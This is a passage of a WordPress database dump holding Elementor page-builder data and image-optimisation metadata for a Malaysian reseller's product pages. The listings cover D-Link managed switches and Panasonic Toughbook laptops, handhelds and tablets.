Uplink\",\"header_size\":\"h4\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"db53704\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/DES-1510-52-510x600.jpg\",\"id\":2647}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"37182c4\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>\\u2022 48 Ports 10\\/100\\/1000 Base-T + 2 SFP Ports + 2 x 10G SFP+ Slots<\\/p><p>\\u2022\\u00a0Physical Stacking via two 10 Gigabit SFP+ Ports with stacking up to six device<\\/p><p>\\u2022\\u00a0Virtual stacking of up to 32 units via D-link\\u2019s\\u00a0Single IP\\u00a0Management (SIM)<\\/p><p>\\u2022\\u00a0Built-in SNMP MIB for remote Network\\u00a0Management Systems<\\/p><p>\\u2022\\u00a0Support G.8032 ERPS to achieve high reliability \\u00a0and network stability<\\/p><p>\\u2022\\u00a0Auto Surveillance (ASV), Auto Voice\\u00a0VLAN for VoIP and Video Surveillance deployments.<\\/p><p>\\u2022\\u00a0802.1X port based\\u00a0authentication, for authentication through\\u00a0external RADIUS servers<\\/p><p>\\u2022\\u00a0IEEE 802.3az Energy Efficient Ethernet with \\u00a0D-Link Green 3.0 power-saving features<\\/p><p>\\u2022\\u00a0Loopback Detection automatically disables port or VLAN when a loop is detected<\\/p><p>\\u2022\\u00a0Support\\u00a0Layer 2 Features \\u2013\\u00a0IGMP &amp; MLD Snooping, 802.3x \\u00a0Flow control \\u00a0and LLDP<\\/p><p>[maxbutton id=\\\"6\\\" ]\\u00a0<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"38f0a9a\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"4be48a8\",\"elType\":\"widget\",\"settings\":{\"title\":\"28-Port Layer 3 Lite Smart Managed Gigabit PoE Switch with 4 10G uplink\",\"header_size\":\"h4\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"3f346e9\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/DGS-1510-28XMP_A1_Image-LFront-510X600-510x600.jpg\",\"id\":2648}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"052fb2e\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>\\u2022 24 Ports 10\\/100\\/1000 Base-T PoE + 4 x 10G SFP+ Slots<\\/p><p>\\u2022\\u00a0Support IEEE 802.3af (PoE) and 802.3at (PoE+) \\u00a0with Power Budget of 370W<\\/p><p>\\u2022\\u00a0Physical Stacking via two 10 Gigabit SFP+ Ports with stacking up to six device<\\/p><p>\\u2022\\u00a0Virtual stacking of up to 32 units via D-link\\u2019s\\u00a0Single IP\\u00a0Management (SIM)<\\/p><p>\\u2022\\u00a0Support G.8032 ERPS to achieve high reliability \\u00a0and network stability<\\/p><p>\\u2022\\u00a0Auto Surveillance (ASV), Auto Voice\\u00a0VLAN for VoIP and Video Surveillance deployments.<\\/p><p>\\u2022\\u00a0802.1X port based\\u00a0authentication, for authentication through\\u00a0external RADIUS servers<\\/p><p>\\u2022\\u00a0IEEE 802.3az Energy Efficient Ethernet with \\u00a0D-Link Green 3.0 power-saving features<\\/p><p>\\u2022\\u00a0Loopback Detection automatically disables port or VLAN when a loop is detected<\\/p><p>\\u2022\\u00a0Support\\u00a0Layer 2 Features \\u2013\\u00a0IGMP &amp; MLD Snooping, 802.3x \\u00a0Flow control \\u00a0and LLDP<\\/p><p>[maxbutton id=\\\"6\\\" ]\\u00a0<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"17edb25\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"98c3571\",\"elType\":\"widget\",\"settings\":{\"title\":\"28-Port Layer 3 Lite Smart Managed Gigabit Switch with 4 10G uplink\",\"header_size\":\"h4\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"a2dc1a5\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/DGS-1510-28X-510x600.jpg\",\"id\":2649}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"82006f7\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>\\u2022 24 Ports 10\\/100\\/1000 Base-T PoE + 4 x 10G SFP+ Slots<\\/p><p>\\u2022\\u00a0Physical Stacking via two 10 Gigabit SFP+ Ports with stacking up to six device<\\/p><p>\\u2022\\u00a0Virtual stacking of up to 32 units via D-link\\u2019s\\u00a0Single IP\\u00a0Management (SIM)<\\/p><p>\\u2022\\u00a0Support G.8032 ERPS to achieve high reliability \\u00a0and network stability<\\/p><p>\\u2022\\u00a0Auto Surveillance (ASV), Auto Voice\\u00a0VLAN for VoIP and Video Surveillance deployments.<\\/p><p>\\u2022\\u00a0802.1X port based\\u00a0authentication, for authentication through\\u00a0external RADIUS servers<\\/p><p>\\u2022\\u00a0IEEE 802.3az Energy Efficient Ethernet with \\u00a0D-Link Green 3.0 power-saving features<\\/p><p>\\u2022\\u00a0Loopback Detection automatically disables port or VLAN when a loop is detected<\\/p><p>\\u2022\\u00a0Support\\u00a0Layer 2 Features \\u2013\\u00a0IGMP &amp; MLD Snooping, 802.3x \\u00a0Flow control \\u00a0and LLDP<\\/p><p>[maxbutton id=\\\"6\\\" ]\\u00a0<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false}]'),(3611,2660,'_elementor_version','0.4'),(4036,2728,'wp-smpro-smush-data','a:2:{s:5:\"stats\";a:8:{s:7:\"percent\";d:14.15316873722283474990035756491124629974365234375;s:5:\"bytes\";i:17100;s:11:\"size_before\";i:120821;s:10:\"size_after\";i:103721;s:4:\"time\";d:0.460000000000000019984014443252817727625370025634765625;s:11:\"api_version\";s:3:\"1.0\";s:5:\"lossy\";b:0;s:9:\"keep_exif\";i:0;}s:5:\"sizes\";a:4:{s:9:\"thumbnail\";O:8:\"stdClass\":5:{s:7:\"percent\";d:14.6199999999999992184029906638897955417633056640625;s:5:\"bytes\";i:1810;s:11:\"size_before\";i:12382;s:10:\"size_after\";i:10572;s:4:\"time\";d:0.040000000000000000832667268468867405317723751068115234375;}s:6:\"medium\";O:8:\"stdClass\":5:{s:7:\"percent\";d:14.4199999999999999289457264239899814128875732421875;s:5:\"bytes\";i:5398;s:11:\"size_before\";i:37446;s:10:\"size_after\";i:32048;s:4:\"time\";d:0.1600000000000000033306690738754696212708950042724609375;}s:19:\"onepress-blog-small\";O:8:\"stdClass\":5:{s:7:\"percent\";d:10.4199999999999999289457264239899814128875732421875;s:5:\"bytes\";i:2658;s:11:\"size_before\";i:25520;s:10:\"size_after\";i:22862;s:4:\"time\";d:0.11999999999999999555910790149937383830547332763671875;}s:14:\"onepress-small\";O:8:\"stdClass\":5:{s:7:\"percent\";d:15.910000000000000142108547152020037174224853515625;s:5:\"bytes\";i:7234;s:11:\"size_before\";i:45473;s:10:\"size_after\";i:38239;s:4:\"time\";d:0.14000000000000001332267629550187848508358001708984375;}}}'),(3614,2662,'_edit_lock','1572926175:1'),(3615,2662,'_edit_last','1'),(3616,2662,'_wp_page_template','template-fullwidth.php'),(3617,2662,'_hide_page_title',''),(3618,2662,'_hide_header',''),(3619,2662,'_hide_footer',''),(3620,2662,'_hide_breadcrumb',''),(3621,2662,'_cover',''),(3622,2662,'_show_excerpt',''),(3623,2662,'_wc_apply_product',''),(3624,2662,'_yoast_wpseo_content_score','90'),(3656,2679,'_elementor_version','0.4'),(3659,2680,'_elementor_edit_mode','builder'),(3660,2680,'_elementor_template_type','post'),(3661,2680,'_wp_page_template','template-fullwidth.php'),(3662,2680,'_elementor_data','[{\"id\":\"292e187\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"19fa744\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"b9d3051\",\"elType\":\"widget\",\"settings\":{\"title\":\"Computer Toughbook\",\"header_size\":\"h3\",\"title_color\":\"#000000\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"18d10b9\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"330ac40\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"52bc26e\",\"elType\":\"widget\",\"settings\":{\"title\":\"TOUGHBOOK 33\",\"header_size\":\"h4\",\"title_color\":\"#000000\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"e3edb98\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/tb_33_hero.png\",\"id\":2594}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"2aad3d3\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h5 class=\\\"field__label\\\">PRODUCT DETAILS<\\/h5><div class=\\\"field__item\\\"><p>The Panasonic TOUGHBOOK\\u00ae 33 is the first fully-rugged 2-in-1 of its kind\\u2014redefining rugged flexibility for those who work in demanding conditions. TOUGHBOOK 33 features a groundbreaking 3:2 display, making it easier to handle, while improving readability of the business applications and documents workers use every day. This innovative design also enables backward compatibility with an entire generation of TOUGHBOOK 31 vehicle docks. It\'s as versatile as your job demands it to be. From a brighter 12\\\" detachable screen with infrared camera for Windows Hello support, to hot-swappable twin batteries and a choice of keyboards\\u2014TOUGHBOOK 33 is built for maximum mobility.<\\/p><p><span style=\\\"font-size: 0.875rem;\\\">[maxbutton id=\\\"5\\\" ]<\\/span><\\/p><\\/div>\",\"align\":\"justify\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"6e91208\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"be86921\",\"elType\":\"widget\",\"settings\":{\"title\":\"TOUGHBOOK 31\",\"header_size\":\"h4\",\"title_color\":\"#000000\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"5da701a\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/tb31_win10.jpg\",\"id\":2593}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"4dfcd25\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<header class=\\\"product-details__header\\\"><\\/header><div class=\\\"buttons-bar product-details__dealers\\\"><span style=\\\"color: #333333; font-family: Raleway, Helvetica, Arial, sans-serif; font-size: 15px; font-weight: bold; letter-spacing: 2px; text-transform: uppercase;\\\">PRODUCT DETAILS<\\/span><\\/div><div class=\\\"product-details__description\\\"><div class=\\\"field field--name-field-product-details field--type-text-long field--label-above\\\"><div class=\\\"field__item\\\"><p>Panasonic presents the TOUGHBOOK\\u00ae 31, the reliable laptop offering\\u00a0the world\\u2019s most rugged design. With drop-shock protection and a\\u00a0MIL-STD-810G certification, it\\u2019s the undisputed leader in the fully\\u00a0rugged category. Its Intel\\u00ae Core\\u2122 i5 processor packs a punch and it delivers amazing battery life\\u201419.5 hours, or 29 hours with the optional media bay\\u00a02nd battery. Combine six generations of delivering rugged performance\\u00a0plus an amazing 18 years of consistent docking compatibility, TOUGHBOOK 31 is a laptop that will go the distance with you anytime, anywhere.<\\/p><p><span style=\\\"font-size: 0.875rem;\\\">[maxbutton id=\\\"5\\\" ]<\\/span><\\/p><\\/div><\\/div><\\/div>\",\"align\":\"justify\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"bb47d1c\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"9db1fee\",\"elType\":\"widget\",\"settings\":{\"title\":\"TOUGHBOOK 54\",\"header_size\":\"h4\",\"title_color\":\"#000000\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"15ce475\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/tb_54_hero.png\",\"id\":2595}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"6a00781\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h5 class=\\\"field__label\\\">PRODUCT DETAILS<\\/h5><div class=\\\"field__item\\\"><p>A semi-rugged 14\\u201d laptop, the TOUGHBOOK 54 is the world\'s thinnest and lightest semi-rugged in its class, but now packs even more of a punch. The TOUGHBOOK 54 is now available with 7th Gen Intel\\u00ae processors running Windows\\u00ae 10 Pro and feature a spill-resistant, full magnesium alloy design, storage drive heater and backlit keyboard. The TOUGHBOOK 54 has a wide range of integrated options such as dedicated GPS, 4G LTE mobile broadband with satellite GPS, and dual antenna pass-through. It offers an optional second battery, allowing hot swap battery replacement without the need to shut down or hibernate. The TOUGHBOOK 54 one of the most versatile and advanced semi-rugged notebooks on the market.<\\/p><p><span style=\\\"font-size: 0.875rem;\\\">[maxbutton id=\\\"5\\\" ]<\\/span><\\/p><\\/div>\",\"align\":\"justify\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"3bc7e77\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\"},\"elements\":[{\"id\":\"f01603d\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"75026de\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"c5649b0\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\"},\"elements\":[{\"id\":\"1a9a32a\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"c925bd0\",\"elType\":\"widget\",\"settings\":{\"title\":\"TOUGHBOOK 20\",\"header_size\":\"h4\",\"title_color\":\"#000000\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"4b619a0\",\"elType\":\"widget\",\"settings\":{\"image_size\":\"medium\",\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/20mk2_laptop_right_angle_detached-1.jpg\",\"id\":2596}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"9e46753\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h5 class=\\\"field__label\\\">PRODUCT DETAILS<\\/h5><div class=\\\"field__item\\\"><p>The Panasonic TOUGHBOOK\\u00ae 20 is a fully rugged, lightweight laptop that easily detaches to become a 10.1\\\" tablet. And it only takes one hand. The detachable laptop has a magnesium alloy chassis and is also MIL-STD-810G and IP65 certified, so it can take the abuse of most any job site. At only 3.9 pounds, this 2-in-1 machine is good on the go. The clever built-in handle also functions as a kickstand, providing on-the-job flexibility. And even as the workday gets longer, power won\'t be a problem. The optional bridge battery allows hot swap battery replacement without disruption. The gloved multi touch display is sunlight-viewable, making this hybrid laptop perfect for rugged outdoor environments. With this detachable laptop tablet at your side, you can handle anything the workday throws at you.<\\/p><p><span style=\\\"font-size: 0.875rem;\\\">[maxbutton id=\\\"5\\\" ]<\\/span><\\/p><\\/div>\",\"align\":\"justify\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"5c9e08f\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"830958b\",\"elType\":\"widget\",\"settings\":{\"title\":\"TOUGHPAD FZ-Q2\",\"header_size\":\"h4\",\"title_color\":\"#000000\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"4d72a50\",\"elType\":\"widget\",\"settings\":{\"image_size\":\"medium\",\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/toughpad-q2-hero.png\",\"id\":2597}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"f07ddc4\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h5 class=\\\"field__label\\\">PRODUCT DETAILS<\\/h5><div class=\\\"field__item\\\"><p>From the industry leader in reliability comes the Panasonic TOUGHPAD\\u00ae FZ-Q2 12.5-inch 2-in-1 Windows\\u00ae 10 PC. Built with the rugged durability consumers have come to expect from TOUGHBOOK, this PC is designed for users who need more from their computer than what a typical consumer device can provide. Enhanced with features like a superior battery life and additional ports, the TOUGHPAD FZ-Q2 semi-rugged convertible tablet also possesses a full HD display with an anti-reflective touchscreen along with a spill-resistant keyboard to maximize usability in the field or in the office.<\\/p><p><span style=\\\"font-size: 0.875rem;\\\">[maxbutton id=\\\"5\\\" ]<\\/span><\\/p><\\/div>\",\"align\":\"justify\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"816152c\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"488a087\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"fb85606\",\"elType\":\"widget\",\"settings\":{\"title\":\"Handhelds\",\"header_size\":\"h3\",\"title_color\":\"#000000\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"fda2a67\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"b29f967\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"b63ad5d\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"711ad8e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"68ee5f8\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"32bd399\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"b342b76\",\"elType\":\"widget\",\"settings\":{\"title\":\"TOUGHBOOK T1\",\"header_size\":\"h4\",\"align\":\"center\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"284c9f7\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/fz-t1_image1-1_ss_1.jpg\",\"id\":2601}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"8fca4ad\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h5 class=\\\"field__label\\\">PRODUCT DETAILS<\\/h5><div class=\\\"field__item\\\"><p>The Panasonic TOUGHBOOK\\u00ae\\u00a0T1 is a slim and sleek Android OS based handheld that proudly carries the TOUGHBOOK\\u00a0name. Its ability to be used in the enterprise to collect information from workers in retail stores, warehouses field service, transportation and delivery or many other environments where work must occur belies its mild looking exterior. The FZ-T1 has a quad-core processor and a straight-shooting barcode reader, options to have a pistol grip with trigger, use a stylus pen or connect to multi-carrier 4G LTE with voice capability, yet end users will feel comfortable with its Android OS. This handheld\'s users won\\u2019t miss a beat with its great battery life, glove and rain touch enabled 5\\\" screen, 5 foot drop rating and IP66 and IP68 certification.\\u00a0 The TOUGHBOOK\\u00a0T1 is ready to be used by satisfied end users everywhere in your organization.<\\/p><p>[maxbutton id=\\\"5\\\" ]<\\/p><\\/div>\",\"align\":\"justify\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"c1dba18\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null,\"space_between_widgets\":60},\"elements\":[{\"id\":\"ed06566\",\"elType\":\"widget\",\"settings\":{\"title\":\"TOUGHBOOK N1\",\"header_size\":\"h4\",\"title_color\":\"#000000\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"57df093\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/fz-n1_mk2_android_image_2_1.jpg\",\"id\":2604}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"380b880\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h5 class=\\\"field__label\\\">PRODUCT DETAILS<\\/h5><div class=\\\"field__item\\\"><p>The Panasonic TOUGHBOOK\\u00ae N1 \\u2014 a powerful, slim and fully rugged handheld. It\\u2019s the all-in-one tool you\\u2019ve been waiting for, and it\\u2019s ideal for where work takes you each day. With an octa-core processor, angled rear-facing barcode reader, optional stylus pen, and long-lasting battery that is warm-swappable; you won\\u2019t miss a beat. And when a flexible device is in demand, the TOUGHBOOK N1 delivers the Android\\u2122 operating system,\\u00a0giving you the ability to develop in an open environment with thousands of enterprise grade applications at your fingertips from the Google Play store or Panasonic\'s partners: independent software vendors (ISVs) and resellers\\/integrators. Plus, with built-in multi-carrier 4G LTE, voice capabilities, and dual SIM cards, the TOUGHBOOK N1 is ready to go where business takes you. And if it takes a seven-foot drop, don\\u2019t worry \\u2014 it can handle it, making it the choice for unrelenting conditions. So take it to work. It can take it.<\\/p><p>[maxbutton id=\\\"5\\\" ]<\\/p><\\/div>\",\"align\":\"justify\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"6aba493\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"3256f2d\",\"elType\":\"widget\",\"settings\":{\"title\":\"TOUGHPAD FZ-X1\",\"header_size\":\"h4\",\"title_color\":\"#000000\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"b370c19\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/236380_F1X1_Hero.png\",\"id\":2603}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"1efa495\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h5 class=\\\"field__label\\\">PRODUCT DETAILS<\\/h5><div class=\\\"field__item\\\"><p>The TOUGHPAD\\u00ae FZ-X1 is the world\'s most rugged 5-inch tablet and a whole lot more. For the first time, you can pair military-grade toughness and enterprise-class mobile computing power with Android-powered 4G data and voice services. Now field staff in the most demanding environments can have all the computing power they need in a handheld tablet small enough to drop in a pocket. Built on the flexible, secure Android 5.1.1 OS, the FZ-X1 lets businesses leverage their existing investments in enterprise applications without sacrificing performance and ruggedness. And it is seriously rugged.\\u00a0Thirty minutes of under five feet of water rugged.\\u00a0Ten foot drops onto solid concrete rugged. Built-in heater for -4\\u00b0 F weather rugged. Whether you throw it in a toolbox or literally take it into battle, the FZ-X1 can handle whatever comes its way.<\\/p><p>[maxbutton id=\\\"5\\\" ]<\\/p><\\/div>\",\"align\":\"justify\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"645131d\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"5ec8bc5\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"cea0ebe\",\"elType\":\"widget\",\"settings\":{\"title\":\"Tablets\",\"header_size\":\"h3\",\"title_color\":\"#000000\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"c92f938\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"bb0c96c\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"9e27fe8\",\"elType\":\"widget\",\"settings\":{\"title\":\"TOUGHBOOK L1\",\"header_size\":\"h4\",\"title_color\":\"#000000\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"f6ee69c\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/fz-l1_right_ss.jpg\",\"id\":2609}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"636c2cc\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h5 class=\\\"field__label\\\">PRODUCT DETAILS<\\/h5><div class=\\\"field__item\\\"><p>The Panasonic TOUGHBOOK L1 is a slim and sleek Android\\u2122 OS based\\u00a07\\\" tablet that proudly carries the TOUGHBOOK\\u00a0name. Its ability to be used\\u00a0in the enterprise to collect information from workers in retail stores,\\u00a0warehouses field service, transportation and delivery or many other\\u00a0environments where work must occur belies its mild looking exterior.\\u00a0The TOUGHBOOK L1 has a quad-core processor and optional straight-shooting\\u00a0barcode reader from portrait to landscape, use a stylus pen or connect\\u00a0to multi-carrier 4G LTE and provide the ease of use of the Andorid OS.\\u00a0This tablet\\u2019s users won\\u2019t miss a beat with its great battery life, glove and\\u00a0rain touch enabled 7\\\" screen, 5 foot drop rating and IP65 and IP67\\u00a0certification. The TOUGHBOOK L1 is ready to be used by satisfied end\\u00a0users everywhere in your organization.<\\/p><p>[maxbutton id=\\\"5\\\" ]<\\/p><\\/div>\",\"align\":\"justify\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"d16c223\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"ba5591e\",\"elType\":\"widget\",\"settings\":{\"title\":\"TOUGHPAD FZ-M1\",\"header_size\":\"h4\",\"title_color\":\"#000000\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"ca8b0be\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/fz-m1_image_01_new_win10.jpg\",\"id\":2610}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"30fc1f3\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h5 class=\\\"field__label\\\">PRODUCT DETAILS<\\/h5><div class=\\\"field__item\\\"><p>The Panasonic FZ-M1 is the fully rugged Windows\\u00ae tablet, built to\\u00a0enable mission-critical mobile worker productivity without compromise. Powered\\u00a0by Windows\\u00ae 10 Pro, the FZ-M1 features a long life, user-replaceable\\u00a0battery and a daylight-readable, high-sensitivity multi-touch display for use\\u00a0with heavy gloves. With the broadest range of configuration options available in\\u00a0its class, the highly customizable FZ-M1 is the ideal tool for today\\u2019s\\u00a0mobile workforce. In addition to the highly configurable options, added models\\u00a0of Thermal Camera, Real Sense Camera, RTK\\/GPS, as well as several more.\\u00a0Allows the FZ-M1 to be the most comprehensive 7\\\" tablet in the market.<\\/p><p>[maxbutton id=\\\"5\\\" ]<\\/p><\\/div>\",\"align\":\"justify\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"ddfa1b6\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"ac4648e\",\"elType\":\"widget\",\"settings\":{\"title\":\"TOUGHPAD FZ-G1\",\"header_size\":\"h4\",\"title_color\":\"#000000\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"ca5913e\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/fz-g1mk5_us_image02_ss.jpg\",\"id\":2611}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"a32d55e\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h5 class=\\\"field__label\\\">PRODUCT DETAILS<\\/h5><div class=\\\"field__item\\\"><p>The FZ-G1 Windows 10 Pro tablet offers a fluid user experience\\u00a0while providing crucial port connectivity and feature-rich options in a compact\\u00a0size. Designed for highly mobile field workers, it\\u2019s the thinnest and lightest\\u00a0fully rugged 10.1\\\" tablet running Windows 10 Pro 64-Bit. Powered by an\\u00a0Intel\\u00ae Core\\u2122 i5 vPro\\u2122 processor with a MIL-STD-810G and IP65 certified, the FZ-G1 Windows 10 tablet leads the way in rugged mobile\\u00a0computing. Add to that an HD daylight-readable 10-point gloved multi touch +\\u00a0waterproof digitizer pen, and it becomes an essential tool for field workers.\\u00a0With added Thermal camera and IR camera options.\\u00a0 Can also support \\\"Windows Hello\\\" for enhanced security.<\\/p><p>[maxbutton id=\\\"5\\\" ]<\\/p><\\/div>\",\"align\":\"justify\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"0d7ecd2\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\"},\"elements\":[{\"id\":\"ae2a70d\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"b56dd64\",\"elType\":\"widget\",\"settings\":{\"title\":\"TOUGHPAD 